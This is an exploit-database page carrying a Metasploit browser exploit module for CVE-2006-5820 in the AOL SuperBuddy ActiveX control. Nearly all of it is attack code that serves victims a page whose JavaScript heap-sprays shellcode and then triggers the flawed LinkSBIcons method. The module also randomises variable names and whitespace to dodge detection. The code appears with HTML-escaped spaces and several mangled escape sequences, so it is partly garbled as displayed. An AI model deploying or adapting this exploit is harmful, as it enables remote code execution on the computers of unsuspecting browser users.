AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)

2007-04-0700:00:00
Root
www.seebug.org
0.604 Medium
EPSS
Percentile
97.5%
JSON
No description provided by source.

                                                
require&nbsp;\'msf/core\'

module&nbsp;Msf

class&nbsp;Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons&nbsp;<&nbsp;Msf::Exploit::Remote

	include&nbsp;Exploit::Remote::HttpServer::HTML

	def&nbsp;initialize(info&nbsp;=&nbsp;{})
		super(update_info(info,
			\'Name\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'AOL&nbsp;Sb.Superbuddy&nbsp;vulnerability\',
			\'Description\'&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;%q{
				This&nbsp;module&nbsp;exploits&nbsp;a&nbsp;flaw&nbsp;in&nbsp;AOL&nbsp;Sb.SuperBuddy.&nbsp;We&nbsp;stole&nbsp;this&nbsp;code&nbsp;from&nbsp;a&nbsp;pre-existing&nbsp;metasploit&nbsp;module.
			},
			\'License\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;MSF_LICENSE,
			\'Author\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;
				[&nbsp;
					\'kradchad\',
					\'leetpete\'
				],
			\'Version\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'0.1\',
			\'References\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;
				[
					[&nbsp;\'CVE\',&nbsp;\'CVE-2006-5820\']
				],
			\'Payload\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>
				{
					\'Space\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;1024,
					\'BadChars\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\"x00\",
	
				},
			\'Platform\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'win\',
			\'Targets\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>
				[
					[\'Windows&nbsp;XP&nbsp;SP0-SP2&nbsp;/&nbsp;IE&nbsp;6.0SP1&nbsp;English\',&nbsp;{\'Ret\'&nbsp;=>&nbsp;0x0c0c0c0c}&nbsp;]
				],
			\'DefaultTarget\'&nbsp;&nbsp;=>&nbsp;0))
	end

	def&nbsp;autofilter
		false
	end
	
	def&nbsp;on_request_uri(cli,&nbsp;request)

		#&nbsp;Re-generate&nbsp;the&nbsp;payload
		return&nbsp;if&nbsp;((p&nbsp;=&nbsp;regenerate_payload(cli))&nbsp;==&nbsp;nil)

		#&nbsp;Encode&nbsp;the&nbsp;shellcode
		shellcode&nbsp;=&nbsp;Rex::Text.to_unescape(payload.encoded,&nbsp;Rex::Arch.endian(target.arch))
		
		#&nbsp;Get&nbsp;a&nbsp;unicode&nbsp;friendly&nbsp;version&nbsp;of&nbsp;the&nbsp;return&nbsp;address
		addr_word&nbsp;&nbsp;=&nbsp;[target.ret].pack(\'V\').unpack(\'H*\')[0][0,4]

		#&nbsp;Randomize&nbsp;the&nbsp;javascript&nbsp;variable&nbsp;names	
		var_buffer&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_shellcode&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_unescape&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_x&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_i&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_tic&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		var_toc&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		
		#&nbsp;Randomize&nbsp;HTML&nbsp;data
		html&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;rand_text_alpha(rand(30)+2)
		
		#&nbsp;Build&nbsp;out&nbsp;the&nbsp;message
		content&nbsp;=&nbsp;%Q|
<html>
<head>
	<script>
	try&nbsp;{
	
	var&nbsp;#{var_unescape}&nbsp;&nbsp;=&nbsp;unescape&nbsp;;
	var&nbsp;#{var_shellcode}&nbsp;=&nbsp;#{var_unescape}(&nbsp;\"#{shellcode}\"&nbsp;)&nbsp;;
	
	var&nbsp;#{var_buffer}&nbsp;=&nbsp;#{var_unescape}(&nbsp;\"%u#{addr_word}\"&nbsp;)&nbsp;;
	while&nbsp;(#{var_buffer}.length&nbsp;<=&nbsp;0x100000)&nbsp;#{var_buffer}+=#{var_buffer}&nbsp;;

	var&nbsp;#{var_x}&nbsp;=&nbsp;new&nbsp;Array()&nbsp;;	
	for&nbsp;(&nbsp;var&nbsp;#{var_i}&nbsp;=0&nbsp;;&nbsp;#{var_i}&nbsp;<&nbsp;120&nbsp;;&nbsp;#{var_i}++&nbsp;)&nbsp;{
		#{var_x}[&nbsp;#{var_i}&nbsp;]&nbsp;=&nbsp;		
			#{var_buffer}.substring(&nbsp;0&nbsp;,&nbsp;&nbsp;0x100000&nbsp;-&nbsp;#{var_shellcode}.length&nbsp;)&nbsp;+&nbsp;#{var_shellcode}&nbsp;;
	}
	
	
&nbsp;&nbsp;&nbsp;	var&nbsp;#{var_tic}&nbsp;=&nbsp;new&nbsp;ActiveXObject(&nbsp;\'Sb.SuperBuddy.1\'&nbsp;);	
	try&nbsp;{&nbsp;#{var_tic}.LinkSBIcons(&nbsp;#{target.ret}&nbsp;)&nbsp;;&nbsp;}&nbsp;catch(&nbsp;e&nbsp;)&nbsp;{&nbsp;}

	
	}&nbsp;catch(&nbsp;e&nbsp;)&nbsp;{&nbsp;window.location&nbsp;=&nbsp;\'about:blank\'&nbsp;;&nbsp;}
	
	</script>
</head>
<body>
#{html}
</body>
</html>		
		|

		#&nbsp;Randomize&nbsp;the&nbsp;whitespace&nbsp;in&nbsp;the&nbsp;document
		content.gsub!(/s+/)&nbsp;do&nbsp;|s|
			len&nbsp;=&nbsp;rand(100)+2
			set&nbsp;=&nbsp;\"x09x20x0dx0a\"
			buf&nbsp;=&nbsp;\'\'
			
			while&nbsp;(buf.length&nbsp;<&nbsp;len)
				buf&nbsp;<<&nbsp;set[rand(set.length)].chr
			end
			
			buf
		end
		
		print_status(\"Sending&nbsp;exploit&nbsp;to&nbsp;#{cli.peerhost}:#{cli.peerport}...\")

		#&nbsp;Transmit&nbsp;the&nbsp;response&nbsp;to&nbsp;the&nbsp;client
		send_response_html(cli,&nbsp;content)
	end

end

end

&nbsp;
0.604 Medium
EPSS
Percentile
97.5%
JSON
Related for SSV:6595